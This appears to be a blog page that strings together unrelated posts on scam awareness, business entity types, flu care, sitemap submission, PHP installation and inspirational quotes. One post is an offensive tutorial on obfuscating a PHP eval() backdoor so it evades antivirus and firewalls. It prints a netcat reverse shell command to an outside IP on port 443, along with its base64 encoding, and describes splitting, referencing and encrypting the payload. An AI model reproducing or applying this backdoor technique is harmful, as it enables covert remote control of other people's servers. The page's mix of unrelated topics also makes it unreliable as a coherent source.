blog

What is Scamming System?

A scamming system refers to the methods and techniques used by individuals or groups to deceive and defraud others for personal gain. Scams can take various forms and can target individuals, businesses, or even governments. Here are some common types of scamming systems:

  1. Online Scams: These scams are conducted over the internet and can include phishing emails, fraudulent websites, or social engineering tactics to trick people into revealing personal information or sending money.
  2. Investment Scams: Scammers promise high returns on investments that are often too good to be true. They may use pyramid schemes, Ponzi schemes, or fake investment opportunities to lure victims.
  3. Tech Support Scams: Scammers pose as tech support representatives and claim that your computer or device is infected with malware or has technical issues. They then offer to “fix” the problem for a fee or gain access to your computer to steal information.
  4. Romance Scams: Also known as “catfishing,” scammers create fake online personas to establish romantic relationships with individuals, often leading to requests for money or gifts under false pretenses.
  5. Lottery and Prize Scams: Victims receive notifications claiming they have won a lottery or prize, but they must pay fees or provide personal information to claim their winnings. In reality, there are no winnings.
  6. Impersonation Scams: Scammers pretend to be someone else, such as a government official, police officer, or utility company representative, to intimidate victims into paying money or providing information.
  7. Charity Scams: Scammers impersonate charitable organizations or create fake charities to solicit donations for fake causes. The money typically goes into the scammer’s pockets.
  8. Job and Employment Scams: Scammers offer fake job opportunities, often requiring upfront payments for training, materials, or background checks. The promised job may not exist, or it may be significantly different from what was advertised.
  9. Real Estate and Rental Scams: Scammers list properties for sale or rent that they don’t own, collecting deposits or payments from unsuspecting victims.
  10. Advance Fee Fraud: Victims are asked to pay an upfront fee to access a more substantial amount of money, such as an inheritance, lottery winnings, or a business opportunity. After paying the initial fee, victims never receive the promised funds.

To protect yourself from scams, it’s essential to be vigilant, verify the legitimacy of offers or requests, and never send money or share personal information with unknown individuals or organizations. If you suspect you have encountered a scam, report it to your local authorities or relevant consumer protection agencies.

Romance scams are a type of online fraud where scammers create fake identities and build romantic relationships with individuals with the intent to exploit them emotionally and financially. These scams often follow a similar pattern:

  1. Creation of a Fake Profile: Scammers typically create attractive and convincing profiles on dating websites, social media, or even in online gaming communities. They may use stolen photos or images of models to make their profiles more appealing.
  2. Establishing a Connection: Once the fake profile is set up, the scammer begins interacting with potential victims. They often use flattery, compliments, and affectionate messages to build trust and establish a romantic connection quickly.
  3. Escalating the Relationship: As the relationship progresses, the scammer may become more intimate and express strong feelings of love and commitment. They might even discuss plans for the future together.
  4. Creating a Crisis: At a certain point in the relationship, the scammer typically introduces a crisis or emergency situation. This could involve a fabricated medical issue, a legal problem, or a financial hardship. They use this crisis to elicit sympathy and create a sense of urgency.
  5. Request for Money: The scammer eventually asks the victim for money to help resolve the crisis. They might claim they need funds for medical bills, travel expenses to meet the victim, or to get out of a difficult situation. They may also request expensive gifts.
  6. Repeat Requests: If the victim sends money or gifts, the scammer will often continue to invent new crises or reasons for financial assistance, stringing the victim along for as long as possible.
  7. Disappearance: Once the scammer has obtained as much money as they can or if they sense that the victim is becoming suspicious, they may suddenly disappear, leaving the victim emotionally devastated and financially drained.

It’s important to be cautious when engaging in online relationships, especially with people you’ve never met in person. Here are some tips to protect yourself from romance scams:

  1. Be Skeptical: If someone you meet online seems too good to be true or rushes into a romantic relationship very quickly, exercise caution.
  2. Protect Your Personal Information: Avoid sharing personal or financial information with someone you’ve met online, especially if you haven’t met them in person.
  3. Do a Reverse Image Search: You can use reverse image search tools to check if the photos the person has shared with you are stolen from elsewhere on the internet.
  4. Verify Their Identity: If you suspect someone may be a scammer, ask for video calls or insist on meeting in person if they claim to be nearby. Scammers often make excuses to avoid face-to-face interactions.
  5. Stay Informed: Be aware of common red flags and the tactics scammers use. Educate yourself on the signs of romance scams.
  6. Report Suspicious Activity: If you believe you’ve encountered a romance scammer, report them to the platform you met them on and to law enforcement. This can help prevent others from falling victim to the same scam.

Remember that scammers are skilled manipulators, and their primary goal is to exploit your emotions and trust. Staying vigilant and cautious is key to avoiding romance scams.

Impersonation scams involve scammers pretending to be someone they’re not in order to deceive and defraud individuals. These scams can take various forms, with the scammer impersonating figures of authority or trusted entities to exploit their victims. Here are some common examples of impersonation scams:

  1. Government Impersonation Scams: In this type of scam, the fraudster poses as a government official, such as an IRS agent, a police officer, or an immigration officer. They may claim that you owe taxes, have outstanding warrants, or face deportation and threaten legal action or arrest unless you pay fines or provide personal information.
  2. Utility Company Impersonation Scams: Scammers impersonate employees of utility companies like electricity, water, or gas providers. They may threaten to disconnect your service unless you make immediate payments to a specific bank account or provide sensitive information over the phone.
  3. Bank Impersonation Scams: Scammers pretending to be bank representatives contact individuals, claiming there’s an issue with their accounts, such as unauthorized transactions or security breaches. They then request account details or ask victims to log in to fake websites to steal login credentials.
  4. Tech Support Impersonation Scams: Scammers impersonate tech support agents from reputable companies like Microsoft or Apple. They claim there are issues with your computer or software and offer to help, often charging a fee for unnecessary services or gaining remote access to your computer to steal personal information.
  5. Family Member Impersonation Scams: Scammers pretend to be a family member, such as a grandchild or sibling, claiming they’re in trouble, often in a foreign country. They request money for emergencies like bail, medical bills, or travel expenses.
  6. Social Media Impersonation Scams: Scammers create fake social media profiles using stolen photos and information to impersonate friends or acquaintances. They then reach out to contacts and ask for money, claiming they’re in distress.
  7. Business Impersonation Scams: Scammers impersonate business executives, often through email, requesting employees to transfer funds or send sensitive information to fraudulent accounts. This is commonly referred to as CEO fraud or business email compromise (BEC) scams.

To protect yourself from impersonation scams:

  1. Verify the Identity: Always verify the identity of individuals or organizations that contact you with unusual requests, especially if they demand personal or financial information.
  2. Use Official Contact Information: If you receive a suspicious call or message, independently verify the contact details of the entity they claim to represent and contact them using official contact information.
  3. Be Cautious with Personal Information: Avoid sharing personal, financial, or sensitive information over the phone or online unless you’re certain of the legitimacy of the request.
  4. Stay Informed: Keep yourself informed about common impersonation scams and their tactics, so you can recognize potential scams.
  5. Report Suspicious Activity: If you suspect you’re dealing with an impersonation scam, report it to the relevant authorities or organizations. Reporting can help prevent others from falling victim to the same scam.

Impersonation scams rely on deception and intimidation, so staying vigilant and questioning unexpected requests is essential to avoid falling prey to these fraudulent schemes.

Social media impersonation scams involve individuals or groups creating fake profiles or accounts on social networking platforms to impersonate others, usually with the intention of deceiving or defrauding people. These scams can target individuals, friends, family members, or even public figures. Here’s a more detailed explanation of how social media impersonation scams work:

  1. Creation of Fake Profiles: Scammers create social media profiles using stolen photos and information from real individuals. They may choose to impersonate friends, acquaintances, celebrities, or even family members to make their profiles appear convincing.
  2. Friend Requests and Messages: Once the fake profile is set up, the scammer often sends friend requests or messages to the target’s friends or contacts. They may also send a message to the target themselves, posing as the person they are impersonating.
  3. Building Trust: After connecting with the target or their friends, the scammer works on building trust. They may engage in casual conversations, share personal information, and mimic the writing style or communication patterns of the person they are impersonating.
  4. Deceptive Requests: At some point, the scammer introduces a deceptive request. This could include asking for money, personal information, or suggesting the target click on a malicious link. For example, they might claim to be in a difficult situation and urgently need financial assistance.
  5. Emotional Manipulation: Impersonation scammers often employ emotional manipulation tactics. They may play on the target’s emotions by pretending to be in distress, facing a crisis, or expressing love or affection to gain sympathy and trust.
  6. Monetary or Data Theft: Once the target falls for the scam and complies with the scammer’s request, the scammer can achieve their objectives. This may involve stealing money from the victim, committing identity theft, or using the obtained information for other fraudulent activities.
  7. Continuation or Disappearance: Depending on the scammer’s goals, they may either continue to exploit the victim or disappear after obtaining what they want. If the victim becomes suspicious or refuses further requests, the scammer may cease contact and move on to other targets.

To protect yourself from social media impersonation scams:

  1. Verify Profiles: If you receive friend requests or messages from someone you already know, double-check their existing profile to ensure it’s legitimate. Be cautious if you receive duplicate friend requests.
  2. Examine Profiles Closely: Scrutinize the profiles of new connections for inconsistencies, such as strange usernames, limited activity, or a lack of personal details.
  3. Communicate Outside of Social Media: If you receive a suspicious message, try contacting the person through other means, such as their phone number or email address, to verify their identity.
  4. Educate Yourself: Be aware of the common tactics used in social media impersonation scams and familiarize yourself with the privacy settings on your social media accounts to control who can contact you.
  5. Report Suspicious Activity: Report fake profiles and suspicious messages to the social media platform to help prevent others from falling victim to the same impersonation scam.

It’s crucial to remain vigilant and skeptical when interacting with people on social media, especially if the requests or messages seem unusual or raise red flags. Trust your instincts and take steps to verify the identity of individuals before sharing personal information or engaging in financial transactions.

Mobile Legends cannot Update Claim Update Prize 2023

If you can’t update Mobile Legends resources, to overcome this you can try to provide Mobile Legends game cache and data in the following way. First, please open the Management Application and then look for the Mobile Legends game. Clean Mobile Legends cache and data. Done.

You restart your game in the middle of download? I’ve had this happen as well but it let me claim rewards after a few tries. Try restarting your game and see if that works.

  • Restart and Clear Cache not working
  • Force Close and Open Play Store not working
  • Click Update Button not working

Click Here to Update

Mobile Legends: Bang Bang Update

https://mobile-legends.en.aptoide.com/app

LLC vs. S Corp vs. C Corp vs Nonprofit Corp

There are generally four types of corporations that are commonly used for incorporation:

  • C Corporation
  • S Corporation
  • Nonprofit Corporation
  • Professional Corporation

To compare top-level attributes for each type of corporation and compare them to other business structures, please visit our Business Structures Chart.

Limited liability company (LLC)

A limited liability company is a business entity that offers some separation of the people owning the business from the business itself. An LLC protects its owners (known as “members”) from being financially liable for most debts and damages and protects their personal assets in the event a business fails.

Forming an LLC requires that the business owner(s) file articles of incorporation. These articles outline the structure of the business. This is where LLCs rise above the other business entity types available to US small businesspeople—an LLC can opt for many different operating models: a 50/50 partnership, or even maintain a board of directors, like a C corporation.

The main advantage to forming and operating as an LLC lies in its simplicity. Income is taxed at the personal level one time, as opposed to at the corporate level, or both the corporate and personal levels (“double taxation”). LLCs can also choose what tax treatment works best for them—they can opt for pass-through taxation, like an S corp, or double taxation, like a C corp.

See our state specific guides for California LLCTexas LLC and Florida LLC.

C Corporation

  • C Corporation is also known as a general for-profit corporation.
  • The C Corporation is the most common form of corporate entity.
  • The C Corporation is formed by filing an Articles of Incorporation with the state office.
  • The C Corporation is owned by shareholders and there is no limit on the number of shareholders in a C Corporation.
  • The shareholders elect a Board of Directors to create and direct the high-level policies of the business. This Board of Directors then appoints corporate officers who in turn manage the day-to-day operations of the business.
  • Shareholders generally have limited liability, even if they are involved in the day-to-day management while wearing the hat of an employee or a corporate officer.
  • The shares of a corporation are freely transferable unless limited by the agreement of the shareholders.
  • The corporation exists indefinitely, unless and until it is dissolved.
  • It is a separately taxable entity, meaning that it must file its own tax return and pay corporate taxes on its profits.

S Corporation

An S Corporation is formed in the same way that a C Corporation. However, the S Corporation is different from a C Corporation in two significant ways:

  • The S Corporation makes an election to be taxed as a pass-through entity under subchapter S of the Internal Revenue Code. This means that an S Corporation is not taxed separately and apart from its owners and/or shareholders. Instead, corporate profits and losses are passed-through and reported on the personal income tax returns of the shareholders, much like a partnership.
  • In contrast to a C Corporation, an S Corporation has limitations on ownership.
  • In an S Corporation:
    • There is a limit of up to 100 shareholders.
    • Each shareholder must be an individual or a trust (not another corporation)
    • Each individual shareholder must be a citizen of the United States or a “Resident Alien” which includes Permanent Residents (a person who has been issued a Green Card) and certain Aliens who pass the Substantial Presence Test. These residents (who pass the Substantial Presence Test) need not be permanent residents. They can be Visa holders (H1/L1) and still be considered Resident Alien per tax laws.

Nonprofit Corporation

For those groups that are formed for charitable, educational, religious, literary, or scientific purposes, and not for the purpose of generating profits for its shareholders, a special legal entity may be formed under Section 501(c)(3) of the Internal Revenue Code. A fully and properly qualified 501(c)3 Nonprofit Corporation has the following characteristics:

  • The corporation is exempt from taxation.
  • Tax-exempt corporations are prohibited from paying dividends.
  • Upon dissolution, corporate assets must generally be distributed to another qualified nonprofit group.
  • Significant filing requirements may exist at both the State and Federal level to establish and maintain tax-exempt status.
  • A nonprofit corporation may be prohibited from engaging in certain activities, including participating in political campaigns and substantial engagement in lobbying activities.

Professional Corporation

  • Professional Corporation is used by businesses that provide a professional service. Examples include:
    • Physicians or Doctors
    • Attorneys or Law Firms
    • Accounting Professionals or CPAs
    • Architects
    • And other licensed professionals
  • Most states have special filing requirements when incorporating.
  • A Professional Corporation can shield a professional service provider (doctors, attorneys, accountants, etc.) from liability for the operations of the business.
  • The tax advantages for a Professional Corporation are the same as the advantages afforded to a C Corporation or S Corporation.
  • Corporate filing requirements can vary and may be more or less expansive depending on your state.
  • Laws governing professional services and corporations are often quite complex. We strongly urge you to consult with an attorney before making the decision to incorporate as a professional corporation.

State of incorporation

Small business owners in the US may incorporate their company in any of the 50 states. The state in which you incorporate your small business determines a variety of important factors, not just which laws your company is subject to. It will dictate how your business is taxed and even where you can sue or be sued.

Variables to consider when choosing where to incorporate your small business include:

  • Geographical convenience. Is the state of incorporation easy to get to?
  • Minimum owners. Certain states require a certain number of people to establish a business.
  • Tax structure. How much does the state levy annually in corporate franchise tax? Will income your business earns elsewhere be subject to taxes in the state of incorporation?
  • Records. Some states require that you keep records within state lines.
  • Banking. Some states require that a corporate bank account exist, and oftentimes within the boundaries of the state of incorporation.

Special requirements for special fields

Certain fields requiring special certification or licenses—such as medical or legal practice—are limited in terms of what types of business entity practitioners can elect to form. Depending on the state of incorporation, groups of such professionals may have to come together in the form of a professional corporation or professional services corporation.

Professional services corporations allow licensed professionals to benefit from the liability protections embedded in traditional corporate structures, excluding malpractice claims against licensed practitioners themselves. Professional services corporations are taxed like C corps. They are subject to corporate tax, as well as tax on shareholder distributions.

In some states, such as California or Virginia, professionals may organize into LLPs or LLCs. The main difference between an LLP/LLC model and a professional services corporation is that the latter must pay income taxes on the corporation itself, like a C corp, whereas with LLPs and LLCs, members pay personal income taxes on income received.

Occupations covered by these state mandates may include:

  • Lawyers (lawyers are barred from forming LLCs in some states)
  • Accountants
  • Health care professionals
  • Engineers and architects

Monk and His Brother – Save Rock and Roll Album – Fall Out Boy

It’s like that angel/devil on your shoulder whispering in your ear when you need to make an ethical/moral decision.

Don’t know anything about the picture, but even if the boys are brothers, it doesn’t necessarily show a culture clash. There is a tradition in south east asia of boys being ordained as a monk temporarily, so we can’t assume that the boy is a monk still or that the boy on the right has not been one.

It really bugs me when people post pictures like this with that extra unnecessary personal opinion on the end.

“Absolutely breathtaking” “Stunning” “Incredible” “Mind blowing”

I’ll be the judge of whether I find this picture breathtaking or not thanks very much, I don’t need the sensationalism.

It’s a neat picture, but no, it does not “leave me breathless”, when people say shit like that about relatively innocuous pictures it just makes me picture you all as fawning dandies that faint from elation at the mere suggestion of a well executed photograph.

Rein it in guys, no need to cream your panties.

Systemic Viral Illness

What is Systemic Viral Illness?

Fever that is caused by a virus is commonly termed Systemic Viral Illness or Influenza or Flu. Most commonly these viruses are Influenza A or Influenza B. The infection spreads fast via airborne droplets by coughing or sneezing and by direct contact. This disease is usually not serious among young and healthy adults, who normally recover from it even without treatment, but it can be fatal among the elderly and those with heart or lung ailments.

Symptoms

  1. Fever
  2. Chills
  3. Body aches (joints and muscles)
  4. Red watery eyes
  5. Cough
  6. Congested or runny nose
  7. sore throat
  8. Headache
  9. Tiredness
  10. Weakness
  11. Loss of appetite
  12. Diarrhea

Instructions

  1. Take a complete rest in a well-ventilated room until the disease clears up.
  2. Drink plenty of fluids but do not take alcohol
  3. Take antifever medicine but avoid aspirin
  4. Take a cough medicine if needed
  5. Take a cough suppressant for dry cough and an expectorant for productive cough
  6. Consult your doctor

Submitting your sitemap to search engines via HTTP GOOGLE AND BING

Submitting your sitemap to search engines via HTTP can be done using a straightforward method. Here are the general steps to submit your sitemap using an HTTP request:

  1. Create or Generate Your Sitemap:
    • If you haven’t already, create a valid XML sitemap for your website. This sitemap should list all the URLs you want search engines to index.
  2. Host the Sitemap on Your Web Server:
    • Upload your sitemap file to your web server or hosting account. You should be able to access it via a URL, such as https://yourwebsite.com/sitemap.xml.
  3. Use a Web Browser or Command-Line Tool:
    • You can use a web browser or a command-line tool like curl or wget to send an HTTP request to search engines. Below are examples of how to do this:
    Using a Web Browser:
    • Open your web browser and visit the respective URL to submit your sitemap to Google or Bing:
      • For Google: https://www.google.com/ping?sitemap=https://yourwebsite.com/sitemap.xmlFor Bing: https://www.bing.com/ping?sitemap=https://yourwebsite.com/sitemap.xml
      Replace https://yourwebsite.com/sitemap.xml with the actual URL of your sitemap.
    Using Command-Line Tools (e.g., curl):
    • Open your command-line interface and run one of the following commands to submit your sitemap to Google:bashCopy codecurl -H "Content-Type: text/plain" --data "https://yourwebsite.com/sitemap.xml" "https://www.google.com/ping?sitemap"
    • Or submit your sitemap to Bing:bashCopy codecurl -H "Content-Type: text/plain" --data "https://yourwebsite.com/sitemap.xml" "https://www.bing.com/ping?sitemap"
  4. Check the Response:
    • After submitting the HTTP request, you should receive a response from the search engine. This response will typically indicate whether the sitemap submission was successful.
  5. Monitor Search Console:
    • Although submitting via HTTP can notify search engines of your sitemap, it’s a good practice to monitor your Google Search Console and Bing Webmaster Tools accounts. These tools provide more insights into the indexing status of your website and any potential issues.

Submitting your sitemap via HTTP is a convenient and straightforward way to inform search engines about your website’s structure and content updates. However, keep in mind that while this method helps with initial discovery, it does not replace the need for regular monitoring and management of your website’s SEO through official search engine webmaster tools.

How To Use csrf_exclude_uris in CodeIgniter 3+

For excluding the method one by one, you need to list it on the array,

[
    'controller/method_a'
    'controller/method_b'
    'controller/method_c'
];

There is a wild card for exclude 1 controller. For example you have log controller, and want to exclude all controllers not using CSRF token.

$config['csrf_exclude_uris'] = ["log.*+"];

.*+ is the wild card for the /method

PHP Shell Eval() Backdoor Obfuscation

Introduction

When working with any programing or scripting language you might ask your self is this language could be used for “hacking”, this question in the beginning could be very superficial but let’s take it real. I do love PHP a lot to be honest, I’m using it in everything, in web, cryptography when I want to perform cryptographical tasks and even in backdoors, Its very clear language and its purpose and more in very good way. I asked my self what If we can do something new with this great language, let’s obfuscate a backdoor to avoid detection by AV and at the same time let’s make this code behaves like an ordinary code and from here the idea came.

Walk through the standards

Before starting any thing new you should put your standards and policies first to see how you should build your new theory, for example I put the following standards for me to follow and care about:

  • Payload delivery
  • Symantec and Signature based detections
  • Readability of the code
  • Command execution workflow
  • Firewalls

And more but these are my major standards I want to care about them while crafting this backdoor.

Planning for the theory

Now after we knew what we going to do and what standards we should follow we came to the planning section, I wanted to make something new to the security appliances, something isn’t commonly used against these appliances, so, the chances of detection will be decreased. In my plan I decided to follow the following rules:

Using multiple foreign languages which rarely used to write our backdoor.

Every variable with certain languages should have its own reference variable which basically written in different variable, this step will confuse the code more and more.

Variables sequences should be varied, so, debugging or deobfuscating the code now should be harder.

System commands and PHP codes will be used in this mission should be encoded, truncated and every truncated part should be in a single variable, each single variable should has its own reference variable and this reference variable should follow the standards mentioned before, in addition the sequence of truncated encoded string should be varied in sorting, but when decoding it using decoder function it will be concatenated in the right sequence with the reference variable used and we can make a mix of reference and standard variables as we will see later in this article.

The decoder function also should be obfuscated by truncating it following the previous rules, then using it as a variable to decode the encoded string.

Variables names also should consists of special characters like ‘_’ and numbers, for example if we have language like the Chinese language, maybe one word in English translated to two strings in Chinese, so we can used multiple forms and identifying more than single variable with the same name, like:

$最後の4

$最後の3

$最後の_3

$最_後の1

This would confuse the code more and more.

Its optionally and recommended in my point of view to encrypt your obfuscated code then make a backdoor decrypt the obfuscated code and run it immediately, so, your code will be very safe because it’s just decrypt a string then execute that string, but deeply it’s a backdoor. Kindly want to note here that windows installation of PHP is very funny, so, it disables the openssl extension by default when installing but allows eval function 🙂 .. this means if you want to use the encryption method you should make sure that your target enabled the openssl extension, but if your target was links then no worries.

1. Start crafting the command

Yes we will do obfuscating to our code, but even the system command should be executed somehow safely, you can also obfuscate the system command!, but let’s make it simple this time and make a standard payload but with some security standards to avoid detection, first of all let’s list the standards we’ll follow while doing this crafting:

Connecting to our remote host using standard port usually opened and whitelisted in Firewalls .e.g. 443.

Turning off any verbose because we want to make everything silent and at the same time clean in the compromised machine.

Running the command in the background trying to make it silent more and more.

And just for notice, system command may not lead directly to reverse shell, for example you can make the powershell download a ps script then run it in the memory directly and gaining reverse shell, but because here we’re concentrating in the obfuscation we’ll make it as simple as we can, so, we’ll use netcat.

The command I used in this obfuscated payload is:

system(“start /b ncat.exe 192.168.245.213 443 -e cmd.exe”);

And for sure the IP here varied but other than the IP is the same. Now as explained before we should encode, and here the encoded text is:

c3lzdGVtKCJzdGFydCAvYiBuY2F0LmV4ZSAxOTIuMTY4LjI0NS4yMTMgNDQzIC1lIGNtZC5leGUiKTs=

Note: If you did obfuscated a payload then found a base padding like: — == — at the end of the base you can safely remove it as a type of confusing and hiding the identity of the encoding / base, and we did this here.

Let’s discuss how we should use it in our obfuscated code:

c3lzdGVtKCJ || zdGFydCA || vYiBuY2F0LmV4ZS || AxOTIuMTY4L || jI0NS4 || yMTMgNDQzIC1l || IGNtZC5leGUiKTs

We can truncated with non-standard truncation as you can see above, which means every part of the base64 here will be in different bits, so, when sorting it into the variables it will be hard to detect if these strings are related to each other or not, for example:

The encoded PHP system command execution and the system command itself.

So, as you can see in the picture above the encoded payload length varied and the sequence is not the right sequence for this encoding to work, but when we gonna decode it, we’ll put the right sequence — obfuscated surely —

2. Handling the decoding function

As we know, we did encoded the payload which will be executed — including the PHP system command executing function — and now we should do the same with decoding function, if remember what we said in the Planning section about the decoding function, we said that even the decoding function should be obfuscated, truncated and non-sorted also. Let’s take a look at this part of the code:

Before continue we should note again that you can make your own base encoding function and obfuscate it — it would be better — even you can do other techniques like ROT13 and you can develop it too. Let’s continue here and discuss the above code, here we did truncated the function name to many parts trying to hide it and also you may ask: but its in plain text, is it ok? and the answer is yes and no:

Yes, because simply it will be putted in reference variables by the way so it will be hard to find / detect.

No, because we can use techniques like reverse or ROT13 then pass it as function after decoding from these techniques and it would be better.

And now you’ll see that when we going to use it, we’ll use it references which already referenced :), so, it will be like that:

So, now the base64 being used easily as function from the variable which already uses a reference variable mixed with standard variables. Then now it runs the decoding function safely without any problems here.

3. Payload handling while decoding

This part is the easiest part in this techniques, all what you should do is to avoid using the encoded payload part directly, you should use reference variables with the techniques / rules explained before, this make the payload more confused. We can also concatenate the payload by grouping every couple of encoded parts in a group then using it again — with the right sequence of encoded payload to decode it right — we can discuss that in the following code:

4. Obfuscated payload with reference variables

Here I didn’t marked all the payloads but you get the point now, and if you concentrated here specially:

Here we used the variable $最後の3 to store a part of base64_decode function and at the same time we used $最後の4 to be used as a reference to the variable $_變量1 which stores a part of the payload will be executed, so, it will be confusing to use the same variable with changing only one character for very different purpose, and the same for the other variables highlighted, its the art of obfuscation.

5. Executing the magic

Finally now we’ll execute the decoded base64 using eval function as shown:

And now simply when running it, it will give us the reverse shell we want with persistence even if the user hit CTRL + C because we did it in the background if you remember:

6. Final touches

As mentioned you can also use the encryption to hide the entire obfuscated payload, in the following code:

Here we will encode our obfuscated code first to handle it safely in this encryption phase and to avoid bugs, by the way it will be saved inside base64_decode() function, so, if any other function will handle it, it will be the ordinary code without encoding. We’ll take this encrypted / ciphered backdoor now and will do the following:

Here we’re going to decrypt the ciphered obfuscated payload and run it into eval function immediately as you can see.

7. Conclusion

The obfuscation is an art, there are no limits to what you can do, always think crazily and outside the box, be the red and blue teamer then cock your payload and feed it to the system.

Source: CyberGuy

Install PHP 8.2.8 In Ubuntu NGINX Server

PHP 8.2 also includes bug fixes and performance improvements over previous versions like 8.1. We recommend you test your codebase with PHP 8.2 before upgrading in a production setup, just to ensure that everything works as expected.

In this article we shall cover steps that are used in the installation of PHP 8.2 on Ubuntu 22.04|20.04|18.04. The default version of PHP available on OS repositories is usually older than PHP official latest releases. PPA (Personal Package Archive) software repositories for PHP allows you to install newer releases of PHP on your Ubuntu system that are not available in the official repositories of a Linux distribution.

sudo apt update

sudo apt install -y lsb-release gnupg2 ca-certificates apt-transport-https software-properties-common

sudo add-apt-repository ppa:ondrej/php

sudo apt install php8.2-cli php8.2-fpm php8.2-common php8.2-mysql php8.2-pgsql php8.2-zip php8.2-gd php8.2-mbstring php8.2-curl php8.2-xml php8.2-bcmath php8.2-memcached

php -v

PHP 8.2.8 (cli) (built: Jul 8 2023 07:10:21) (NTS)
Copyright (c) The PHP Group
Zend Engine v4.2.8, Copyright (c) Zend Technologies
with Zend OPcache v8.2.8, Copyright (c), by Zend Technologies

Five phrases that need to be contemplated to respond to life #JMCmuse

When Facing Hard Time #jmcmuse by josuamarcelc

Whatever you want to control, actually that’s what will control you, when you want nothing more, the world is yours.

你想控制什么,其实它就会控制你,当你什么都不想要的时候,世界就是你的了。

Nǐ xiǎng kòngzhì shénme, qíshí tā jiù huì kòngzhì nǐ, dāng nǐ shénme dōu bùxiǎng yào de shíhòu, shìjiè jiùshì nǐ dele.

Apapun yang ingin kamu kendalikan, sebenarnya itulah yang akan mengendalikanmu, ketika kamu tidak menginginkan apapun lagi, dunia menjadi milikmu.

Meet because there is a debt to pay, part because the debt has been paid. If in the previous life there was no debt, then in this life it will not meet.

见面是因为有债要还,部分是因为债已经还清了。 前世若无债,今生不相见。

Jiànmiàn shì yīnwèi yǒu zhài yào hái, bùfèn shì yīnwèi zhài yǐjīng huán qīngle. Qiánshì ruò wú zhài, jīnshēng bù xiāng jiàn.

Bertemu karena ada hutang yang harus dibayar, berpisah karena hutang sudah dilunasi. Jika di kehidupan sebelumnya tidak berhutang, maka di kehidupan ini tidak akan bertemu.

Do not be afraid to lose everything that is lost to you, the truth is not yours. Also don’t be afraid of getting hurt that can hurt you is the test of your life.

不要害怕失去你失去的一切,真相不属于你。 也不要害怕受到伤害,伤害你的是你人生的考验。

Bùyào hàipà shīqù nǐ shīqù de yīqiè, zhēnxiàng bù shǔyú nǐ. Yě bùyào hàipà shòudào shānghài, shānghài nǐ de shì nǐ rénshēng de kǎoyàn.

Jangan takut kehilangan semua yang hilang darimu, sejatinya memang bukan milikmu. Juga jangan takut terluka yang bisa melukaimu adalah ujian hidupmu.

Don’t be greedy, you can’t have everything, also don’t be discouraged you can’t have anything. If it’s yours, there’s no need to fight. If it’s not yours, you won’t even get it.

不要贪婪,你不能拥有一切,也不要气馁,你什么也不能拥有。 如果是你的,就没必要争了。 如果它不是你的,你甚至不会得到它。

Bùyào tānlán, nǐ bùnéng yǒngyǒu yīqiè, yě bùyào qìněi, nǐ shénme yě bùnéng yǒngyǒu. Rúguǒ shì nǐ de, jiù méi bìyào zhēngle. Rúguǒ tā bùshì nǐ de, nǐ shènzhì bù huì dédào tā.

Jangan serakah, kamu tidak mungkin memiliki segalanya, juga jangan berkecil hati kamu tidak mungkin memiliki apapun. Jika memang milikmu, tidak perlu berjuang. Jika bukan milikmu berjuangpun tidak akan dapat.

Some things God does not allow you to succeed in are to protect you. Remember.. ” Gaining is not necessarily a blessing, losing is not necessarily a disaster.”

上帝不允许你成功的一些事情是为了保护你。 记住.. “得到未必是福,失去未必是祸”。

Shàngdì bù yǔnxǔ nǐ chénggōng de yīxiē shìqíng shì wèile bǎohù nǐ. Jì zhù.. “Dédào wèibì shì fú, shīqù wèibì shì huò”.

Beberapa hal, Tuhan tidak mengizinkanmu berhasil melakukannya adalah untuk melindungimu. Ingatlah.. “Mendapatkan belum tentu berkah, kehilangan belum tentu bencana.”

Exit mobile version